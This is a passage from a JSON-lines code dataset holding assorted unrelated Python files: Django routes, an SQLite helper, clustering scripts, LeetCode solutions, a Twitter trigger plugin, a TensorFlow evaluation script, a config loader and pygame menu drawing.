main()","sub_path":"python_scrapy/second_week/daxuepaiming.py","file_name":"daxuepaiming.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"232602307","text":"from django.urls import path\nfrom . 
import views\nfrom django.contrib.auth import views as auth_views\n\napp_name = 'blog'\nurlpatterns = [\n path('', views.PostListView.as_view(), name='home'),\n path('post//', views.PostDetailView.as_view(), name='detail'),\n# path('post/create/', views.create_post, name='create'),\n path('post/create/', views.PostCreateView.as_view(), name='create'),\n path('login/', auth_views.LoginView.as_view(template_name='blog/login.html'), name='login'),\n path('logout/', auth_views.LogoutView.as_view(template_name='blog/logout.html'), name='logout'),\n# path('register/', views.register, name='register'),\n path('register/', views.UserRegisterView.as_view(), name='register'),\n path('post//update/', views.PostUpdateView.as_view(), name='update'),\n# path('post//update2/', views.post_update, name='update2'),\n path('post//delete/', views.delete_post, name='delete'),\n path('post//delete2/', views.PostDeleteView.as_view(), name='delete2'),\n]\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"182397005","text":"#!/usr/bin/env python3\nimport sqlite3 as lite\nfrom os.path import exists\n\nclass DataBase(object):\n \"\"\"\n Object to connect to a database,\n When not exists, it will create the file and structure\n \"\"\"\n def __init__(self, path):\n \"\"\"\n path = path to location where file should be\n \"\"\"\n created = exists(path)\n # create connection\n self.con = lite.connect(path)\n \n if not created:\n self.create_structure()\n self.id = 0\n else:\n cur = self.con.cursor()\n cur.execute(\"SELECT MAX(id) from Posts\")\n self.id = cur.fetchone()[0]\n if not self.id: self.id = 0 \n\n self.postbuffer = []\n self.acbuffer = []\n\n def __insert(self, sql, values):\n with self.con:\n try:\n cur = self.con.cursor()\n cur.executemany(sql, values)\n except lite.Error:\n if self.con:\n self.con.rollback()\n raise\n \n def create_structure(self):\n with self.con:\n cur = self.con.cursor()\n # posts table\n cur.execute(\n \"\"\"\n CREATE TABLE Posts(\n id INTEGER PRIMARY KEY,\n month INTEGER,\n year INTEGER,\n author TEXT,\n postno INTEGER\n )\"\"\"\n )\n cur.execute(\n \"\"\"\n CREATE TABLE Aircraft(\n post INTEGER,\n name TEXT,\n FOREIGN KEY(post) REFERENCES Posts(rowid)\n )\n \"\"\"\n )\n\n def flush(self):\n if self.postbuffer:\n self.__insert(\n \"INSERT INTO Posts VALUES(?,?,?,?,?)\",\n self.postbuffer\n )\n self.__insert(\n \"INSERT INTO Aircraft VALUES(?,?)\",\n self.acbuffer\n )\n self.postbuffer = []\n self.acbuffer = []\n \n def insert_post(self, month, year, author, postno, aircraft):\n \"\"\"\n aircraft = list of aircraft names\n returns 0 if not inserted\n returns id of post if inserted\n \"\"\"\n if not aircraft:\n # ignore the ones without aircraft names\n return\n else:\n self.id += 1\n self.postbuffer.append(\n (self.id, int(month), int(year), author, int(postno))\n )\n self.acbuffer += [ (self.id, a) for a in aircraft ]\n if len(self.postbuffer) >= 50000:\n self.flush()\n\n","sub_path":"ww2crawler/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"394207621","text":"\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 10 15:43:34 2020\r\nMicro and Macro data stream clustering\r\n\r\n@author: neshragh\r\n\"\"\"\r\n\r\nfrom sklearn.cluster import AffinityPropagation\r\nimport pandas as pd\r\nimport numpy as 
np\r\nimport matplotlib.pyplot as plt\r\nfrom itertools import cycle\r\nimport datetime\r\nimport os\r\n\r\n\r\n##################################################################\r\n\"\"\"\r\nStage 1: Micro Clustering: based on original dataset and Affinity propagation algorithm\r\nNumber of Clusters can vary based on the damping factor\r\n\r\n\"\"\"\r\n\r\n#delete the prev csv file created from the last run\r\nif os.path.exists('micro_cluster_data.csv'):\r\n os.remove(\"micro_cluster_data.csv\")\r\nif os.path.exists('macro_cluster_data.csv'):\r\n os.remove(\"macro_cluster_data.csv\")\r\n \r\n##open a dataset\r\ndf_dat = pd.read_csv('week4event.csv')\r\n\r\n \r\n# =============================================================================\r\n# str = input(\"Enter start Date(Format:mm/dd/yyyy): \")\r\n# end = input(\"Enter End Date(Format:mm/dd/yyyy): \")\r\n# =============================================================================\r\n\r\ndf_dat['Date'] = pd.to_datetime(df_dat['Date'], format='%m/%d/%Y')\r\n\r\n#dtrang = df_dat.loc[(df_dat.Date >= '2019-05-08') & (df_dat.Date <= '2019-05-10')]\r\n\r\n#dtrang= df_dat[(df_dat['Date'] == '2019-05-10')]\r\ndtrang= df_dat[(df_dat['Date']>datetime.date(2019,4,29)) & (df_dat['Date']= '4/29/2019') &(df_dat['Date'] < '5/1/2019')\r\n#print(df_dat['Date'][5] )\r\n\r\n# =============================================================================\r\n# start_date = pd.to_datetime('05-02-2019')\r\n# e_date = pd.to_datetime('05-03-2019')\r\n# \r\n# for j in pd.date_range(start_date,e_date):\r\n# print(j)\r\n# =============================================================================\r\n\r\n# =============================================================================\r\n# fname = input(\"Enter start time: \")\r\n# fdamping = input(\"Enter Damping Factor Value for Micro clusters(BETWEEN 0.5-0.99): \")\r\n# =============================================================================\r\n\r\nhrstrng = '7:00:00'\r\ngg=hrstrng\r\n#hrstrng = gg = 7\r\n#fname\r\n\r\nfor i in range(7,19):\r\n print(str(i))\r\n hrstrng = str(i) + ':00:00'\r\n nhr = str(i+1) + ':00:00'\r\n\r\n# =============================================================================\r\n# hrstrng = hrstrng.replace(hrstrng[0:2],format(i,'02d'))\r\n# nhr = hrstrng.replace(hrstrng[0:2],format(i +1,'02d'))\r\n# =============================================================================\r\n\r\n if i<10 & i+1>=10:\r\n hrstrng = '0'+ hrstrng\r\n \r\n \r\n# =============================================================================\r\n# if i+1 < 10:\r\n# nhr= '0' + nhr\r\n# =============================================================================\r\n \r\n \r\n print(hrstrng)\r\n \r\n df = dtrang.loc[(dtrang.Time >= hrstrng) & (dtrang.Time <= nhr)]\r\n \r\n \r\n #AP\r\n #X= df.loc[df.index>90000,['Position','Count']].to_numpy()\r\n X = df.to_numpy()\r\n X = X[:,[2, 6]]\r\n #Damp_my_default:.88 var: float(fdamping)\r\n af = AffinityPropagation(preference=-50, damping=.8888888, max_iter= 100 ).fit(X)\r\n cluster_centers_indices = af.cluster_centers_indices_\r\n labels = af.labels_\r\n n_clusters_ = len(cluster_centers_indices)\r\n \r\n #Plotting the result\r\n plt.close('all')\r\n plt.figure(1)\r\n plt.clf()\r\n plt.scatter(df.Position, df.Count, color='c', linewidth=4)\r\n colors = cycle('bgrcmykbgrcmykbgrcmykbgrcmyk')\r\n\r\n for k, col in zip(range(n_clusters_), colors):\r\n class_members = labels == k\r\n cluster_center = X[cluster_centers_indices[k]]\r\n #plot branches\r\n 
plt.plot(X[class_members, 0], X[class_members, 1], col + '.', markersize=10)\r\n plt.plot(cluster_center[0], cluster_center[1], 'o', markerfacecolor=col,\r\n markeredgecolor='k', markersize=15)\r\n \r\n #plot:lines between branches\r\n for x in X[class_members]:\r\n plt.plot([cluster_center[0], x[0]], [cluster_center[1], x[1]], col)\r\n \r\n plt.title('Estimated number of clusters: %d' % n_clusters_)\r\n plt.xlabel('Postions',labelpad=15)\r\n plt.ylabel('Number of people')\r\n \r\n frame =plt.gca()\r\n frame.axes.get_xaxis().set_visible(True)\r\n frame.axes.get_yaxis().set_visible(True)\r\n \r\n #x and y axis values\r\n plt.ylim(-0.7,5)\r\n \r\n plt.xticks([1,2,3,4,5,6], [\"Level 2-1\", \"Level 3-2\\nCentral\", \"Level 4-3\\nNorth\",\r\n \"Level4-3\\nSouth\", \"Level5-4\\nNorth\", \"Level5-4\\nSouth\"])\r\n \r\n plt.show()\r\n \r\n \r\n #save the result in the excel file\r\n exc = pd.DataFrame(X[cluster_centers_indices], columns= ['Position','Count']).T\r\n #change the row and colomns directions\r\n exc = exc.transpose()\r\n #add pandas data to excisting csv file mode a is append\r\n \r\n exc.to_csv( \"micro_cluster_data.csv\", mode='a', header = False)\r\n # exc.drop(exc[], inplace=True, axis=1)\r\n #exc = exc.drop(1, axis=1)\r\n \r\n \r\n\r\n ################################################################################\r\n \r\n\"\"\"\r\nStage 2: Macro clustering:\r\n Generating Macro based on the prev level:Micro Clustering\r\n Save in the seprate csv file \r\n\"\"\"\r\n \r\n \r\nmac = pd.read_csv(\"micro_cluster_data.csv\", header=None)\r\n#X= mac.loc[mac.index<90000,['Position','Count']].to_numpy()\r\nmac = mac.to_numpy()\r\nmac =np.delete(mac,0,axis=1)\r\n#X = X.astype(float )\r\n#X = X[:,[1, 2]]\r\n#X = np.array(X)\r\naaf = AffinityPropagation(preference=-50, damping=.8666, max_iter= 100 ).fit(mac)\r\n#87-833\r\ncluster_centers_indices = aaf.cluster_centers_indices_\r\nlabels = aaf.labels_\r\n#week1=.6\r\n#wek3=77\r\nn_clusters_ = len(cluster_centers_indices)\r\n\r\n\r\n#plot\r\nplt.close('all')\r\nplt.figure(1)\r\nplt.clf()\r\nplt.scatter(mac[:,1], mac[:,0], linewidth=3,facecolors='none', s=120, edgecolor=\"silver\")\r\ncolors = cycle('bgrcmykbgrcmykbgrcmykbgrcmyk')\r\n\r\nfor k, col in zip(range(n_clusters_), colors):\r\n class_members = labels == k\r\n cluster_center = mac[cluster_centers_indices[k]]\r\n #plt.plot(X[class_members, 0], X[class_members, 1], col + '+', markersize=8)\r\n plt.plot(cluster_center[1], cluster_center[0], '+', markerfacecolor=col,\r\n markeredgecolor='crimson', markersize=40 )\r\n \r\n \r\n#plt.title('Estimated number of clusters for Macro Clustering: %d' % n_clusters_)\r\nplt.title('%d' % n_clusters_)\r\n\r\nplt.xlabel('Postions',labelpad=15)\r\nplt.ylabel('Number of people')\r\n\r\nframe =plt.gca()\r\nframe.axes.get_xaxis().set_visible(True)\r\nframe.axes.get_yaxis().set_visible(True)\r\n\r\nplt.ylim(-0.7,50)\r\n\r\nplt.xticks([1,2,3,4,5,6], [\"Level 2-1\", \"Level 3-2\\nCentral\", \"Level 4-3\\nNorth\",\r\n \"Level4-3\\nSouth\", \"Level5-4\\nNorth\", \"Level5-4\\nSouth\"])\r\n\r\nplt.show()\r\n\r\nexc_my = pd.DataFrame(X[cluster_centers_indices], columns= ['Position','Count']).T\r\n#change the row and colomns directions\r\nexc_my = exc_my.transpose()\r\nexc_my.to_csv( \"macro_cluster_data.csv\",index =False)\r\n\r\n\r\n\r\n\r\n","sub_path":"Micro_Macro_clustering/AP_micro¯o_V2.py","file_name":"AP_micro¯o_V2.py","file_ext":"py","file_size_in_byte":7114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} 
+{"seq_id":"86502790","text":"\"\"\"\nTopics: | Hash Table | Two Pointers | String\n\"\"\"\n\nclass Solution:\n\n def lengthOfLongestSubstring(self, string):\n \"\"\"\n Time: O(n)\n Space: O(k)\n\n [k = length of the longest substring w/o repeating characters]\n \"\"\"\n longest = 0\n left, right = 0, 0\n chars = set()\n while left < len(string) and right < len(string):\n if string[right] not in chars:\n chars.add(string[right])\n right += 1\n longest = max(longest, right - left)\n else:\n chars.remove(string[left])\n left += 1\n return longest\n","sub_path":"LeetCode/src/003 - Longest Substring Without Repeating Characters.py","file_name":"003 - Longest Substring Without Repeating Characters.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"426581299","text":"import komand\nimport time\nfrom .schema import UserInput, UserOutput\n\n# Custom imports below\nfrom komand_twitter.util import util\n\n\nclass User(komand.Trigger):\n\n # Constants\n CACHE_FILE_NAME = \"triggers_twitter_user\"\n MAX_TWEET_COUNT = 100 # Max amount supported by Twitter.\n\n interval = util.Common.SleepDuration.HIGH_ACTIVITY # Default to high\n cache_file = None\n cached_id = 0 # The latest ID from the previous fetch.\n\n screen_name = None # The required screen_name of the user to search for\n\n def __init__(self):\n super(self.__class__, self).__init__(\n name=\"user\",\n description=\"Monitor for tweets from a given screen name\",\n input=UserInput(),\n output=UserOutput(),\n )\n\n def run(self, params={}):\n if not self.connection.client:\n assert \"Run: Twitter API client was None.\" # noqa: B101\n raise Exception(\"Run: Twitter API client was None.\")\n\n self.screen_name = params.get(\"screen_name\")\n if not self.screen_name:\n assert \"Run: screen_name parameter was empty. Make sure input is marked required.\" # noqa: B101\n raise Exception(\"Run: screen_name parameter was empty. Make sure input is marked required.\")\n\n # Make doubly sure it defaults to the original value, just in case?\n self.interval = params.get(\"interval\", util.Common.SleepDuration.HIGH_ACTIVITY)\n # Open and auto-close the file to create the cache file on very first start up\n with komand.helper.open_cachefile(self.CACHE_FILE_NAME + \"_\" + self.screen_name) as cache_file:\n self.logger.info(\"Run: Got or created cache file: {file}\".format(file=cache_file))\n\n while True:\n self.logger.info(\"Run: Iterating main loop\")\n\n # Open cache file and read the latest ID from the previous fetch.\n with komand.helper.open_cachefile(self.CACHE_FILE_NAME + \"_\" + self.screen_name) as cache_file:\n self.cached_id = cache_file.readline()\n\n self.logger.info(\"Run: Cached id is {id}.\".format(id=self.cached_id))\n\n tweets = self.get_timeline()\n\n if len(tweets) > 0: # Only trigger if tweets exist.\n self.trigger_on_tweets(tweets=tweets)\n self.logger.info(\"Run: Trigger done. Sleeping {seconds} seconds.\".format(seconds=self.interval))\n else:\n self.logger.info(\"Run: No new tweets. 
Sleeping {seconds} seconds.\".format(seconds=self.interval))\n\n time.sleep(self.interval)\n\n \"\"\"Fetches new tweets from Twitter based on the pattern supplied and then sets the sleep time appropriately.\"\"\"\n\n def get_timeline(self):\n tweets = self.connection.client.GetUserTimeline(\n screen_name=self.screen_name, since_id=self.cached_id, count=self.MAX_TWEET_COUNT\n )\n tweet_count = len(tweets)\n self.logger.info(\"Get Tweets: Got {count} tweets.\".format(count=tweet_count))\n\n return tweets\n\n \"\"\"Takes a list of tweets and sends triggers for them. Writes the first ID (latest) to cache file.\"\"\"\n\n def trigger_on_tweets(self, tweets):\n for index, tweet in enumerate(tweets):\n if index == 0:\n # Write this ID to cache file since it is most up-to-date\n with komand.helper.open_cachefile(self.CACHE_FILE_NAME + \"_\" + self.screen_name) as cache_file:\n cache_file.write(str(tweet.id))\n\n self.logger.info(\"Trigger On Tweets: Sending trigger for tweet {id}.\".format(id=tweet.id))\n payload = self.create_trigger_payload(tweet)\n self.send(payload)\n\n \"\"\"Creates a a payload to send from a tweet.\"\"\"\n\n def create_trigger_payload(self, tweet):\n msg = tweet.text.encode(\"ascii\", \"ignore\")\n user = tweet.user.screen_name.encode(\"ascii\", \"ignore\")\n url = \"{base_url}/{screen_name}/status/{post_id}\".format(\n base_url=self.connection.TWITTER_URL, screen_name=user, post_id=tweet.id\n )\n payload = {\"msg\": msg, \"url\": url, \"user\": user}\n self.logger.info(\"Create Trigger Payload: Created {payload}\".format(payload=payload))\n return payload\n\n def test(self, params={}):\n \"\"\"TODO: Test the trigger\"\"\"\n return {}\n","sub_path":"plugins/twitter/komand_twitter/triggers/user/trigger.py","file_name":"trigger.py","file_ext":"py","file_size_in_byte":4304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"356955409","text":"# -*- coding: utf-8 -*-\r\n\r\nimport sys\r\nimport os\r\nimport time\r\nimport datetime\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport pandas as pd\r\nfrom tensorflow.contrib import learn\r\nimport gflags\r\nimport data_helpers\r\nfrom text_cnn import TextCNN\r\n\r\n\r\n### parameters ###\r\n# ===============================================\r\n\r\nFLAGS = gflags.FLAGS\r\n\r\n# data loading parameters\r\ngflags.DEFINE_string('positive_data_file', './inputs/rt.pos', 'Data source for positive data.')\r\ngflags.DEFINE_string('negative_data_file', './inputs/rt.neg', 'Data source for negative data.')\r\n\r\n# evaluate parameters\r\ngflags.DEFINE_integer('batch_size', 64, 'Batch size (default: 64).')\r\ngflags.DEFINE_string('checkpoint_dir', './', 'Checkpoint directory from the training.')\r\ngflags.DEFINE_bool('eval_train', True, 'Evalute on all the training data.')\r\n\r\n# device parameters\r\ngflags.DEFINE_bool('allow_soft_placement', True, 'Allow device soft device placement.')\r\ngflags.DEFINE_bool('log_device_placement', False, 'Log placement of ops on devices.')\r\n\r\nFLAGS(sys.argv)\r\n# show parameters\r\nprint('\\nPARAMETERS:')\r\nprint('================================')\r\nfor attr, value in FLAGS.flag_values_dict().items():\r\n print('{0}: {1}'.format(attr.upper(), value))\r\nprint('================================\\n\\n')\r\ninput('press enter to start...\\n\\n')\r\n\r\n\r\n# load the train data or your own data.\r\nif FLAGS.eval_train is True:\r\n x_text, y_test = data_helpers.load_text_and_label(file_pos_file=FLAGS.positive_data_file, 
file_neg_file=FLAGS.negative_data_file)\r\n y_test = np.argmax(y_test, axis=1)\r\nelse:\r\n x_text = ['it is so bad.', 'nice buying experience.']\r\n y_test = [0, 1]\r\n\r\n# load the vocabulary\r\nvocab_path = os.path.join(FLAGS.checkpoint_dir, '..', 'vocab')\r\nvocab_prosessor = learn.preprocessing.VocabularyProcessor.restore(vocab_path)\r\nx_test = np.array(list(vocab_prosessor.transform(x_text)))\r\n\r\nprint('Evaluating ...\\n')\r\n\r\n### evaluating\r\n# ===============================================\r\n\r\ncheckpoint_file = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)\r\nprint('Loaded the latest checkpoint: <{}>\\n'.format(checkpoint_file))\r\n\r\ngraph = tf.Graph()\r\nwith graph.as_default():\r\n session_conf = tf.ConfigProto(\r\n allow_soft_placement=FLAGS.allow_soft_placement,\r\n log_device_placement=FLAGS.log_device_placement)\r\n sess = tf.Session(config=session_conf)\r\n with sess.as_default():\r\n # Load the saved meta graph and restore variables\r\n saver = tf.train.import_meta_graph(\"{}.meta\".format(checkpoint_file))\r\n saver.restore(sess, checkpoint_file)\r\n\r\n # Get the placeholders from the graph by name\r\n input_x = graph.get_operation_by_name(\"input_x\").outputs[0]\r\n # input_y = graph.get_operation_by_name(\"input_y\").outputs[0]\r\n dropout_keep_prob = graph.get_operation_by_name(\"dropout_keep_prob\").outputs[0]\r\n\r\n # Tensors we want to evaluate\r\n predictions = graph.get_operation_by_name(\"output/predictions\").outputs[0]\r\n\r\n # Generate batches for one epoch\r\n batches = data_helpers.batch_iter(list(x_test), FLAGS.batch_size, 1, shuffle=False)\r\n\r\n # Collect the predictions\r\n all_predictions = []\r\n for x_test_batch in batches:\r\n batch_predictions = sess.run(predictions, {input_x: x_test_batch, dropout_keep_prob: 1.0})\r\n all_predictions = np.concatenate([all_predictions, batch_predictions])\r\n\r\n# Print accuracy if y_test is defined\r\nif y_test is not None:\r\n correct_predictions = float(sum(all_predictions == y_test))\r\n print(\"\\nTotal number of test examples: {}\".format(len(y_test)))\r\n print(\"Accuracy: {:g}\\n\".format(correct_predictions/float(len(y_test))))\r\n\r\n# Save the evaluation to a csv\r\ndf_pred = np.column_stack((np.array(x_text), all_predictions))\r\nout_path = os.path.join(FLAGS.checkpoint_dir, \"..\", \"prediction.csv\")\r\nprint(\"Saving prediction csv file to {0}\".format(out_path))\r\npd.DataFrame(df_pred).to_csv(out_path, header=['text', 'prediction'])\r\n","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"95973942","text":"a='g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc dmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr\\'q ufw rfgq rcvr gq qm jmle. sqgle qrpgle.kyicrpylq() gq pcamkkclbcb. 
lmu ynnjw ml rfc spj.'\n\n\n\ndef convert(char):\n if ord(char)+2>ord('z'):\n return ((ord(char)+1)%ord('z'))+ord('a')\n else:\n return ord(char)+2\ndef alphaCheck(string,i):\n if(string[i].isalpha()):\n return chr(convert(string[i]))\n else:\n return string[i]\ndef run(string):\n b=''\n for i in range(len(string)):\n tmp=alphaCheck(string,i)\n b+=tmp;\n print(b)\n\nrun(a)\n\n\n\nc='map'\nrun(c)\n","sub_path":"venv/PythonChallenge_01.py","file_name":"PythonChallenge_01.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"598686885","text":"\"\"\"\nPrint a Rectangle\nDraw a rectangle which has a height of H cm and a width of W cm. Draw a 1-cm square by single '#'.\n\nInput\nThe input consists of multiple datasets. Each dataset consists of two integers H and W separated by a single space.\n\nThe input ends with two 0 (when both H and W are zero).\n\nOutput\nFor each dataset, print the rectangle made of H × W '#'.\n\"\"\"\nwhile True:\n H, W = map(int, input().split())\n\n if H == 0 and W == 0:\n break\n for i in range(H):\n print('#' * W)\n print()\n","sub_path":"ITP1/ITP_1_5_A.py","file_name":"ITP_1_5_A.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"407802719","text":"\"\"\"\nConfiguration\n-------------\n\"\"\"\n\nimport os\n\nfrom six.moves.configparser import (\n SafeConfigParser,\n NoSectionError,\n NoOptionError\n)\n\n\nDEFAULT_CONFIG_FILES = ['.moreliarc', '~/.moreliarc', '/etc/morelia.rc']\n\n\ndef expand_all(path):\n \"\"\"Expand path.\"\"\"\n return os.path.abspath(os.path.expandvars(os.path.expanduser(path)))\n\n\nclass Config(object):\n \"\"\"Configuration object.\n\n Configuration is read from ini-style files and environment variables\n prefixed with `MORELIA_`.\n By default Morelia search for files:\n\n * .moreliarc\n * ~/.moreliarc\n * /etc/morelia.rc\n \"\"\"\n\n def __init__(self, config_files=None, config_parser_class=None):\n self._env_prefix = 'MORELIA_'\n self._items = {\n 'tags': None,\n 'formatter': None,\n 'matchers': None,\n 'show_all_missing': False,\n }\n if config_files is None:\n config_files = DEFAULT_CONFIG_FILES\n self._default_section = 'morelia'\n self._config_files = [expand_all(config_file)\n for config_file in config_files]\n if config_parser_class is None:\n config_parser_class = SafeConfigParser\n self._config_parser_class = config_parser_class\n\n def load(self):\n \"\"\"Load configuration.\"\"\"\n self._update_from_file()\n self._update_from_environ()\n\n def _update_from_file(self):\n \"\"\"Update config on settings from *.ini file.\"\"\"\n config_parser = self._config_parser_class()\n config_parser.read(self._config_files)\n for key in self._items.keys():\n try:\n value = config_parser.get('morelia', key)\n except (NoOptionError, NoSectionError):\n pass\n else:\n self._items[key] = value\n\n def _update_from_environ(self):\n \"\"\"Update config on environment variables.\"\"\"\n for key in self._items.keys():\n try:\n value = os.environ[self._env_prefix + key.upper()]\n except KeyError:\n pass\n else:\n self._items[key] = value\n\n def get_tags_pattern(self):\n \"\"\"Return tags pattern.\"\"\"\n tags = self._items.get('tags', '')\n return tags if tags is not None else ''\n\n\ndef get_config(_memo={}):\n \"\"\"Return config object.\"\"\"\n try:\n return _memo['config']\n except KeyError:\n config = Config()\n config.load()\n _memo['config'] = config\n 
return _memo['config']\n","sub_path":"morelia/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"427197789","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 11 14:50:43 2020\r\n\r\n@author: USER\r\n\"\"\"\r\n\r\nimport time\r\nimport random\r\nfrom mcpi.minecraft import Minecraft\r\nmc=Minecraft.create()\r\ntime.sleep(1)\r\nx,y,z=mc.player.getTilePos()\r\nwhile True:\r\n colour=random.randrange(0,16)\r\n mc.setBlocks(x+25,y-1,z+25,x-25,y-1,z-25,95,colour)\r\n time.sleep(0.5)","sub_path":"untitled2.py","file_name":"untitled2.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"486533114","text":"class Solution:\n def maxDistance(self, grid: List[List[int]]) -> int:\n res = -1\n stack = []\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == 1:\n stack.append([i, j])\n if len(stack) == 0 or len(stack) == len(grid) * len(grid[0]):\n return res\n directions = [[1, 0], [-1, 0], [0, 1], [0, -1]]\n while stack:\n new_stack = []\n while stack:\n [i, j] = stack.pop()\n for direction in directions:\n x, y = i + direction[0], j + direction[1]\n if 0 <= x < len(grid) and 0 <= y < len(grid[0]) and grid[x][y] == 0:\n grid[x][y] = \"#\"\n new_stack.append([x, y])\n stack = new_stack\n res += 1\n return res\n","sub_path":"BFS/1162. As Far from Land as Possible.py","file_name":"1162. As Far from Land as Possible.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"45914859","text":"\nimport sys\nfrom unittest import mock\n\nfrom importlib import import_module, reload\n\nimport pytest\n\nextra_checks = {\n 'tensorflow': [\n 'wellcomeml.ml.attention',\n 'wellcomeml.ml.bert_semantic_equivalence',\n 'wellcomeml.ml.bilstm',\n 'wellcomeml.ml.cnn',\n 'wellcomeml.ml.keras_utils',\n # 'wellcomeml.ml.keras_vectorizer',\n # Not working properly yet - reloading the module causes a different errot han ImportError\n 'wellcomeml.ml.similarity_entity_liking'\n ],\n 'torch': [\n # 'wellcomeml.ml.bert_vectorizer',\n # Not working properly yet - reloading the module causes a different error than ImportError\n 'wellcomeml.ml.spacy_classifier',\n 'wellcomeml.ml.similarity_entity_liking',\n # 'wellcomeml.ml.bert_semantic_equivalence'\n ],\n 'spacy': [\n 'wellcomeml.ml.spacy_classifier',\n 'wellcomeml.ml.spacy_entity_linking',\n 'wellcomeml.ml.spacy_knowledge_base'\n ]\n}\n\nmodule_extra_pairs = [\n (module_name, extra_name)\n for extra_name, module_name_list in extra_checks.items()\n for module_name in module_name_list\n]\n\n\n@pytest.mark.extras\n@pytest.mark.parametrize(\"module_name,extra_name\", module_extra_pairs)\ndef test_dependencies(module_name, extra_name):\n \"\"\" Tests that importing the module, in the absence of the extra, throws an error \"\"\"\n\n with mock.patch.dict(sys.modules, {extra_name: None}):\n with pytest.raises(ImportError):\n _tmp_module = import_module(module_name)\n if module_name in sys.modules:\n reload(_tmp_module)\n","sub_path":"tests/test_extras.py","file_name":"test_extras.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"538685242","text":"from constants import *\n\n\ndef draw_menu(win, font_small, font_normal, font_ns, font_huge, logo, 
best_time):\n \"\"\"Процедура, при вызове которой отрисовывается экран мен.\n Аргументы:\n win - окно отрисовки\n font_small, font_normal, font_hugу - соотв. шрифты из main\n logo - файл logo.png\n best_time - лучшее время за сессию\"\"\"\n telerun_txt = font_huge.render('TELERUN', True, (0, 137, 204))\n win.blit(telerun_txt, [0.46 * win_w, 0.3 * win_h])\n\n press_txt = font_ns.render('Попробуйте соединиться с сервером', True, (0, 137, 204))\n win.blit(press_txt, [0.13 * win_w, 0.6 * win_h])\n press_txt = font_ns.render('и обойти все блокировки РКН', True, (0, 137, 204))\n win.blit(press_txt, [0.2 * win_w, 0.65 * win_h])\n press_txt = font_normal.render('Нажмите ENTER для старта...', True, (0, 137, 204))\n win.blit(press_txt, [0.13 * win_w, 0.8 * win_h])\n\n bestt_txt = font_small.render('Лучшее время: ' + str(round(best_time, 1)) + 'С', True, (0, 137, 204))\n win.blit(bestt_txt, [10 * scaling, 0.93 * win_h])\n\n win.blit(logo, (int(145 * scaling), int(108 * scaling)))\n\n\ndef draw_go(win, font_small, font_normal, font_huge, game_time, best_time):\n \"\"\"Процедура, при вызове которой отрисовывается экран 'GAME OVER'\n Аргументы:\n win - окно отрисовки\n font_small, font_normal, font_hugу - соотв. шрифты из main\n game_time - время завершенной игры\n best_time - лучшее время за сессию\"\"\"\n go_txt = font_huge.render('Соединение разорвано', True, (0, 137, 204))\n go_rec = go_txt.get_rect()\n go_rec.center = (win_w / 2, win_h / 3)\n win.blit(go_txt, go_rec)\n\n yres_txt = font_normal.render('Ваш результат: ' + str(round(game_time, 1)) + 'С', True, (0, 137, 204))\n yres_rec = yres_txt.get_rect()\n yres_rec.center = (win_w / 2, win_h / 3 + 100 * scaling)\n bestres_txt = font_normal.render('Лучший результат: ' + str(round(best_time, 1)) + 'С', True, (0, 137, 204))\n bestres_rec = bestres_txt.get_rect()\n bestres_rec.center = (win_w / 2, win_h / 3 + 150 * scaling)\n win.blit(yres_txt, yres_rec)\n win.blit(bestres_txt, bestres_rec)\n\n rest_txt = font_small.render('Нажмите ENTER для повторного соединения', True, (0, 137, 204))\n rest_rec = rest_txt.get_rect()\n rest_rec.center = (win_w / 2, 2 * win_h / 3 + 50 * scaling)\n\n back_txt1 = font_small.render('Нажмите SPACE', True, (0, 137, 204))\n back_rec1 = back_txt1.get_rect()\n back_rec1.center = (win_w / 2, 2 * win_h / 3 + 110 * scaling)\n\n back_txt2 = font_small.render('для паузы', True, (0, 137, 204))\n back_rec2 = back_txt2.get_rect()\n back_rec2.center = (win_w / 2, 2 * win_h / 3 + 150 * scaling)\n\n win.blit(rest_txt, rest_rec)\n win.blit(back_txt1, back_rec1)\n win.blit(back_txt2, back_rec2)\n\n\ndef draw_pause(win, font_small, font_normal, font_huge, game_time):\n \"\"\"Процедура, при вызове которой отрисовывается экран паузы\n Аргументы:\n win - окно отрисовки\n font_small, font_normal, font_hugу - соотв. 
